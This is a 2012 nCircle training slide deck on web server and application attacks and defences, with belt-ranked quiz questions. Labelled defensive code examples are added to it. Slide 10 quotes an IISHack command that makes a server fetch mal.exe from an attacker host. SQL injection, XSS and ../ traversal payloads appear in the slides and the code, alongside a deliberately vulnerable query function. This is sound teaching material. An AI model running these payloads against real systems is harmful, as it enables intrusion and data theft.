nCircle Webinar: Get your Black Belt

Get Your Black Belt in Web Application Security

Page 1: nCircle Webinar: Get your Black Belt

© 2012 nCircle. All rights reserved.

Get Your Black Belt in Web Application Security, 26 April 2012

Page 2: nCircle Webinar: Get your Black Belt

Web Server and Web Applications Security

Page 3: nCircle Webinar: Get your Black Belt

Why Web Servers and Web Applications are hard to Defend

Why is attacking a web server or web applications one of the easiest attack methods?

– On the perimeter
– Accessible by anyone on the Internet
– Need to balance functionality with security
– Port 80 and port 443 (can’t just block them)
– Lack of security awareness of many web developers
– High level of traffic: hard to distinguish an attack from high volumes of legitimate traffic

Page 4: nCircle Webinar: Get your Black Belt

Typical Attack Steps against a Web Server

1. Reconnaissance (passive)

2. Scanning and enumeration (active)

3. Gaining Access (exploit)

4. Escalation of privilege

5. Maintain access

6. Covering tracks and placing backdoors

Page 5: nCircle Webinar: Get your Black Belt

Two Methods of Attack: The Web Server and Web Applications

• Web Server Attacks
– Vulnerabilities in the web server or web server configuration
  • Examples: Buffer Overflows, Traversals

• Web Application Attacks
– Vulnerabilities in web applications
  • Command Injection
  • XSS (Cross Site Scripting)

Page 6: nCircle Webinar: Get your Black Belt

Ichi (one)

With respect to defending against web attacks, what is the security problem with port 80?

a. It is the default TFTP port

b. It can be closed

c. It is not a well-known port

d. It can’t be blocked

Difficulty: Easy/Medium

Page 7: nCircle Webinar: Get your Black Belt

Ni (two)

For an attack to work on a web server or a web application, what does it need to have?

a. An exploit

b. A risk

c. A vulnerability

d. A configuration

Difficulty: Easy/Medium

Page 8: nCircle Webinar: Get your Black Belt

Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.

Page 9: nCircle Webinar: Get your Black Belt

Web Server Attacks

Page 10: nCircle Webinar: Get your Black Belt

Buffer Overflow Attack

A buffer overflow attack allows an attacker to overwrite code in the program’s execution path and thus take control of the program to execute the attacker’s code.

Cause: Poor boundary checking (checking whether a variable is within some bounds before its use)

Example: IISHack.exe exploits the IIS HTTP daemon buffer. Below is a sample:

c:\> iishack www.WebserverA.com 80 www.hackserver.com/mal.exe

Page 11: nCircle Webinar: Get your Black Belt

Web Server File System Traversal Attacks

• Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.

• By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.

• The attack is initiated by inserting special characters into URLs, for example the ../ sequence.

• Encoding can be used to bypass Web server filtering.
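The containment check a static-file handler needs against the ../ and encoding tricks described above, as an added example that is not part of the nCircle deck. The document root, the request paths and the double-decode step are assumptions for this example; the path logic is pure string handling so it runs without the files existing.

```python
# Added example (not from the nCircle deck): keep every resolved request path
# inside the web document root. Percent-decoding is applied twice so that a
# double-encoded "../" (%252e%252e%252f) is caught, then the path is joined to
# the root, normalized, and checked for containment.
import posixpath
from typing import Optional
from urllib.parse import unquote

DOC_ROOT = "/var/www/html"  # assumed document root for this example


def resolve_request_path(doc_root: str, request_path: str) -> Optional[str]:
    """Return the filesystem path for request_path, or None if it would
    escape doc_root."""
    # Two decode passes: the second turns a leftover "%2e" into ".".
    decoded = unquote(unquote(request_path))
    # Some servers treat backslash as a separator; normalize it too.
    decoded = decoded.replace("\\", "/")
    root = posixpath.normpath(doc_root)
    # Join first, then normalize, so ".." components are resolved against
    # the root rather than silently dropped.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Containment: the candidate must be the root itself or live below it.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed request paths: legitimate ones and the bypass shapes the slide names.
REQUESTS = [
    "/index.html",
    "/images/../index.html",
    "/../../etc/passwd",
    "/%2e%2e/%2e%2e/etc/passwd",
    "/%252e%252e/%252e%252e/etc/passwd",
    "/..\\..\\windows\\win.ini",
]

if __name__ == "__main__":
    for req in REQUESTS:
        result = resolve_request_path(DOC_ROOT, req)
        print(f"{req:40} -> {result or 'REJECTED'}")
```

Note the order of operations: normalizing the request path on its own would drop leading ".." components and make every request look contained; joining to the root first is what makes the escape visible.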

Page 12: nCircle Webinar: Get your Black Belt

San (three)

Which one of the following is NOT one of the typical attacks used against a web server like Apache?

a. ARP poisoning

b. Buffer overflow

c. Source disclosure

d. File system traversal

Difficulty: Easy/Medium

Page 13: nCircle Webinar: Get your Black Belt

Shi (four)

A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?

a. Buffer boundary

b. File system traversal

c. Encryption

d. File overflow

Difficulty: Easy/Medium

Page 14: nCircle Webinar: Get your Black Belt

Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.

Page 15: nCircle Webinar: Get your Black Belt

Web Application Attacks

Page 16: nCircle Webinar: Get your Black Belt

OWASP Top 10 Categories

A1-Injection

A2-Cross Site Scripting (XSS)

A3-Broken Authentication/Session Management

A4-Insecure Direct Object References

A5-Cross Site Request Forgery (CSRF)

A6-Security Misconfiguration

A7-Insecure Cryptographic Storage

A8-Failure to Restrict URL Access

A9-Insufficient Transport Layer Encryption

A10-Unvalidated Redirects and Forwards

OWASP Top 10 (2010 List) – www.owasp.org

Page 17: nCircle Webinar: Get your Black Belt

Injection (Command Injection – OWASP A1)

• Occurs when untrusted data is sent to a command interpreter as part of a command or query.

• Cleverly formed data can trick the command interpreter into performing unintended commands or revealing unintended information.

• Examples of command injection:
– SQL Injection
– Script Injection
– Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program.

Page 18: nCircle Webinar: Get your Black Belt

SQL Injection (Valid Data)

As an example, the user enters Jill and Brown into two input fields on a web page.

The program takes this input into the CustID variable and dynamically creates the query string:

SELECT * FROM accounts WHERE customerID = 'Jill_Brown'

The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown’s record as expected.

Page 19: nCircle Webinar: Get your Black Belt

SQL Injection (Invalid Data)

The user enters Jane and Doe' OR '1'='1 on the web page.

The program takes this input and dynamically creates the query string:

SELECT * FROM accounts WHERE customerID = 'Jane_Doe' OR '1'='1'

The program sends this SQL query to the SQL database, which then retrieves ALL of the records in the accounts table: NOT as expected.

Page 20: nCircle Webinar: Get your Black Belt

Defenses Against SQL Injection

• Prepared Statements (parameterized queries)
• Stored Procedures
• Escaping all user supplied input
• Least privilege
• White list input validation

Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org)
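The two preceding slides (the concatenated query with valid and injected input) and the defenses listed here, worked through as an added example that is not part of the nCircle deck. The accounts table, its rows and the letters-only allow-list are constructed for the demo; the CustID value is built as first_last exactly as the slides describe.

```python
# Added example (not from the nCircle deck): the slide's string-built query
# beside a parameterized query and an allow-list check, run against an
# in-memory SQLite table so the difference in returned rows is visible.
import re
import sqlite3

NAME_RE = re.compile(r"[A-Za-z]{1,40}")  # constructed allow-list: letters only


def make_db() -> sqlite3.Connection:
    """Constructed accounts table with three customers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (customerID TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("Jill_Brown", 100), ("Jane_Doe", 250), ("Joe_Bloggs", 75)],
    )
    return conn


def lookup_vulnerable(conn, first: str, last: str):
    """Query built by concatenation, as on the slides. Deliberately
    vulnerable: user input becomes part of the SQL grammar."""
    cust_id = f"{first}_{last}"
    query = f"SELECT * FROM accounts WHERE customerID = '{cust_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, first: str, last: str):
    """Prepared statement: the input is bound as a value, so a quote or an
    OR clause inside it is just text compared against customerID."""
    cust_id = f"{first}_{last}"
    query = "SELECT * FROM accounts WHERE customerID = ?"
    return conn.execute(query, (cust_id,)).fetchall()


def lookup_validated(conn, first: str, last: str):
    """White-list validation in front of the parameterized query: anything
    that is not a plain name is rejected before it reaches the database."""
    if not (NAME_RE.fullmatch(first) and NAME_RE.fullmatch(last)):
        raise ValueError("name must contain letters only")
    return lookup_parameterized(conn, first, last)


if __name__ == "__main__":
    db = make_db()
    injected_last = "Doe' OR '1'='1"
    print("valid, concatenated:   ", lookup_vulnerable(db, "Jill", "Brown"))
    print("injected, concatenated:", lookup_vulnerable(db, "Jane", injected_last))
    print("injected, parameterized:", lookup_parameterized(db, "Jane", injected_last))
    try:
        lookup_validated(db, "Jane", injected_last)
    except ValueError as exc:
        print("injected, validated:    rejected:", exc)
```

The parameterized lookup returns no rows for the injected input rather than all of them, because the database receives the whole string as the value to compare. The allow-list is layered in front of it, not instead of it: the prepared statement is the defense, and validation simply keeps malformed input out of the application earlier.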

Page 21: nCircle Webinar: Get your Black Belt

Cross Site Scripting (XSS – OWASP A2)

(Diagram label: Untrusted data)

• Cross-Site Scripting attacks are a type of injection attack in which malicious scripts are injected into otherwise benign and trusted web sites. Injection usually occurs by inserting untrusted data into a user’s browser via a web page request.

Page 22: nCircle Webinar: Get your Black Belt

Defenses Against XSS

Primary defense: Escaping untrusted data

“Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.

Rule #0 : Never put untrusted data (in a web page) Except in Allowed Locations

Rule #1 : HTML Escape Before Inserting Untrusted Data Except into HTML Element Content

Rules #2 - #7 : These rules deal with exceptions if you put untrusted data in “Unallowed” locations

Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)
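Rule #1 applied in code, as an added example that is not part of the nCircle deck: untrusted data is HTML-escaped before it is placed into element content and into a quoted attribute value. The page templates and the two attacker-style inputs are constructed for the demo; Python's html.escape is the escaping routine used.

```python
# Added example (not from the nCircle deck): escaping untrusted data so the
# browser's parser treats it as text rather than markup. The "unsafe" renderer
# is the 'before' case and is kept only to show the contrast.
from html import escape

# Constructed inputs: one in the shape of a script payload for element
# content, one that tries to close an attribute value early.
CONTENT_PAYLOAD = "<script>alert(1)</script>"
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(1)'


def render_greeting_unsafe(display_name: str) -> str:
    """Before: untrusted data interpolated raw into element content."""
    return f"<p>Hello, {display_name}!</p>"


def render_greeting(display_name: str) -> str:
    """Rule #1: HTML-escape before inserting into element content.
    & < > " ' become entities, so the data cannot open a tag."""
    return f"<p>Hello, {escape(display_name, quote=True)}!</p>"


def render_search_box(previous_query: str) -> str:
    """Untrusted data inside a quoted attribute. Escaping the quote characters
    is what stops the input from ending the value and adding attributes."""
    return f'<input type="text" name="q" value="{escape(previous_query, quote=True)}">'


def contains_raw_markup(rendered: str, template_tag_count: int) -> bool:
    """Demo check: more '<' than the template itself contains means untrusted
    data reached the parser as markup."""
    return rendered.count("<") > template_tag_count


if __name__ == "__main__":
    print(render_greeting_unsafe(CONTENT_PAYLOAD))
    print(render_greeting(CONTENT_PAYLOAD))
    print(render_search_box(ATTRIBUTE_PAYLOAD))
```

Escaping is context-specific, which is what Rules #2 to #7 on the cheat sheet address: the entity encoding shown here is correct for element content and quoted attributes, and a different encoding is needed for data placed into JavaScript, CSS or URL contexts.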

Page 23: nCircle Webinar: Get your Black Belt

Broken Authentication and Session Management (OWASP A3)

• Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone else's identity.

Page 24: nCircle Webinar: Get your Black Belt

Defenses Against Broken Authentication and Session Management

• Secure management of session identifiers
– Do not put session identifiers in the URL
– Session IDs should have a timeout feature

• Do not allow the login process to execute from an unencrypted page

• Password Change Controls
• Password use / strength / storage

• Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)
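The session-identifier defenses above, as an added example that is not part of the nCircle deck: a server-side session store with random IDs from the OS CSPRNG, a Set-Cookie line (so the ID travels in a cookie rather than the URL), an idle timeout enforced on the server, and an HTTPS check for the login flow. The timeout value, cookie name and the list of URL parameter names are assumptions for this example; the clock is injectable so the timeout can be exercised offline.

```python
# Added example (not from the nCircle deck): session handling that follows the
# slide's rules. IDs are unguessable and carry no user data, the cookie is
# marked Secure and HttpOnly, and idle sessions expire on the server.
import secrets
import time

IDLE_TIMEOUT_SECONDS = 15 * 60  # assumed idle timeout for this example
COOKIE_NAME = "sid"             # assumed cookie name


class SessionStore:
    def __init__(self, timeout: float = IDLE_TIMEOUT_SECONDS, clock=time.time):
        self._sessions = {}     # session_id -> {"user": str, "last_seen": float}
        self._timeout = timeout
        self._clock = clock     # injectable for testing

    def create(self, user: str) -> str:
        # 32 random bytes from the OS CSPRNG, URL-safe base64 encoded.
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = {"user": user, "last_seen": self._clock()}
        return session_id

    @staticmethod
    def cookie_header(session_id: str) -> str:
        # Secure: never sent over plain HTTP. HttpOnly: not readable by page
        # scripts, which limits what an XSS can steal. SameSite=Lax: not sent
        # on most cross-site requests, which helps against CSRF.
        return f"Set-Cookie: {COOKIE_NAME}={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"

    def lookup(self, session_id: str):
        """Return the user for a live session, expiring idle ones."""
        entry = self._sessions.get(session_id)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > self._timeout:
            del self._sessions[session_id]  # timed out: must authenticate again
            return None
        entry["last_seen"] = now            # activity extends the idle window
        return entry["user"]

    def logout(self, session_id: str) -> None:
        self._sessions.pop(session_id, None)


def login_allowed(request_scheme: str) -> bool:
    """Refuse to run the login process from an unencrypted page."""
    return request_scheme.lower() == "https"


# Assumed parameter names for a simple audit of 'no session IDs in the URL'.
URL_SESSION_MARKERS = ("sid=", "sessionid=", "jsessionid=", "phpsessid=")


def session_id_in_url(url: str) -> bool:
    lowered = url.lower()
    return any(marker in lowered for marker in URL_SESSION_MARKERS)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("jill")
    print(store.cookie_header(sid))
    print("lookup:", store.lookup(sid))
    print("login over http allowed:", login_allowed("http"))
    print("URL leaks session:", session_id_in_url("https://example.test/app?sid=abc"))
```

The timeout is measured from the last request, not from login, so an active user is not logged out mid-session while an abandoned one expires; an absolute lifetime can be layered on top of this if the policy calls for it.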

Page 25: nCircle Webinar: Get your Black Belt

Go (five)

A web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?

a. Sequence infiltration

b. SQL injection

c. Cookie poisoning

d. Hidden parameter exploit

Difficulty: Easy/Medium

Page 26: nCircle Webinar: Get your Black Belt

Roku (six)

What is one of the defenses against SQL Injection?

a. Least Privilege

b. Black list input validation

c. Sanitization

d. Proxy manipulation

Difficulty: Easy/Medium

Page 27: nCircle Webinar: Get your Black Belt

Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.

Page 28: nCircle Webinar: Get your Black Belt

Web Server and Web Application Defense Tools

Page 29: nCircle Webinar: Get your Black Belt

Web Server and Application Defense Tools (1 of 2)

• Scanning and mapping tools
  • Ping, Nping, Nmap, Amap, SuperScan, …

• Vulnerability and Web vulnerability scanners
  • Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, …

• Web proxy tools
  • WebScarab, Paros Proxy, Burp Proxy, …

• Web mapping/ripping tools
  • Black Widow, Wget, skipfish, …

• Communication/data transfer tools
  • Ncat, telnet, ftp, …

• Exploits, Exploit Kits, and Exploit Frameworks
  • Program for a specific exploit
  • Pen Test frameworks: Metasploit, Core Impact, CANVAS

Page 30: nCircle Webinar: Get your Black Belt

Web Server and Application Defense Tools (2 of 2)

• Password cracking tools
  • John the Ripper, Cain and Abel, PRTK, ophcrack, …

• Web Source Code examination tools
  • Instant Source, Firebug, …

• SQL Injection Tools
  • BSQL Hacker, The Mole, sqlmap, Pangolin, …

Page 31: nCircle Webinar: Get your Black Belt

Network Defense Tools (Protecting the Web Server)

• Routers
• Firewalls (network layer)
• Web Application Firewalls (application layer)
• Web Application Proxies
• Honeypots/Honeynets
• Logging
• Intrusion Detection/Prevention System (IDS/IPS)
• Host-based Intrusion Detection (HIDS), e.g. file integrity detection
• Backups
• Computer Forensic Tools
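The file-integrity style of host-based intrusion detection listed above, as an added example that is not part of the nCircle deck: a baseline of SHA-256 digests is taken over a document root and a later pass reports files that were added, removed or changed. The directory layout and file contents are constructed inside a temporary directory so the demo runs offline.

```python
# Added example (not from the nCircle deck): minimal file-integrity checking
# of the kind an HIDS performs over a web document root. A baseline of
# SHA-256 digests is stored, and a later scan is compared against it.
import hashlib
import os
import tempfile


def hash_file(path: str) -> str:
    """SHA-256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: str) -> dict:
    """Map of path relative to root (with '/' separators) -> digest."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Report added, removed and changed paths between two scans."""
    shared = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "changed": sorted(p for p in shared if baseline[p] != current[p]),
    }


def _write(path: str, text: str) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def demo() -> dict:
    """Constructed scenario: baseline a small document root, then apply the
    three kinds of change an integrity monitor should flag."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "htdocs")
        _write(os.path.join(root, "index.html"), "<h1>Welcome</h1>")
        _write(os.path.join(root, "app", "login.php"), "<?php // login ?>")
        _write(os.path.join(root, "app", "old.php"), "<?php // unused ?>")
        baseline = build_baseline(root)

        _write(os.path.join(root, "index.html"), "<h1>Welcome</h1><!-- changed -->")
        _write(os.path.join(root, "uploads", "extra.php"), "<?php // unexpected ?>")
        os.remove(os.path.join(root, "app", "old.php"))
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

In a deployment the baseline must be stored somewhere the web server process cannot write, and the scan scheduled from outside the web tier; otherwise whoever can change the files can also change the record of what they should be.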

Page 32: nCircle Webinar: Get your Black Belt

Web Server Protection

• Protect the Web Server
• Vulnerability Assessment
• Harden the Web Server
– Host (OS)
– Web Server
– Web Services
• Logging
• Backups and recovery

Page 33: nCircle Webinar: Get your Black Belt

Place the Web Server in an Untrusted Zone

Page 34: nCircle Webinar: Get your Black Belt

Security Harden the Web Server (1 of 2)

• Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC)

• Host (OS) hardening

• Web Server hardening
– Use tools like IIS Lockdown and URLscan
– Harden each service you offer on your Web Server
– Disable / remove anything you don’t use or need: accounts, ports, services, plug-ins
– Configuration settings
– Permissions

Page 35: nCircle Webinar: Get your Black Belt

Security Harden the Web Server (2 of 2)

• Authentication and Access Control
– File and directory permissions
– Account password and lockout policies

• Logging and Audit Policies

• Vulnerability and Compliance Assessments
– Vulnerability scanner
– Web application vulnerability scanner
– Configuration scanner
– Audits for compliance assessments
– Penetration testing / manual testing

Page 36: nCircle Webinar: Get your Black Belt

Web Server Attack Countermeasures

• Buffer Overflow
– Can be mitigated by conducting frequent scans for server vulnerabilities
– Promptly acquiring and installing patches and service packs
– Implementing effective firewalls
– Applying web configuration lockdown utilities

• File System Traversal
– Promptly apply patches and updates to the web server
– Restrict privileges to executable programs such as cmd.exe
– Set file and directory permissions
– Locate the system software on a different disk drive from the web site software and content directory.

Page 37: nCircle Webinar: Get your Black Belt

Shichi (seven)

Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?

a. Banner grabbing

b. Defeating authentication

c. Scanning

d. Password Cracking

Difficulty: Medium/Hard

Page 38: nCircle Webinar: Get your Black Belt

Hachi (eight)

What is a good tool to help harden an IIS web server? (choose the best answer)

a. Cain and Abel

b. URLscan

c. ncat

d. WebScarab

Difficulty: Medium/Hard

Page 39: nCircle Webinar: Get your Black Belt

Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan.

Page 40: nCircle Webinar: Get your Black Belt

Resources

• OWASP (Open Web Application Security Project) www.owasp.org

• NIST (National Institute of Standards and Technology) www.nist.gov

• SANS www.sans.org

• Web Application Security Consortium (WASC) www.webappsec.org

• SecTools.org http://sectools.org

Page 41: nCircle Webinar: Get your Black Belt

Questions?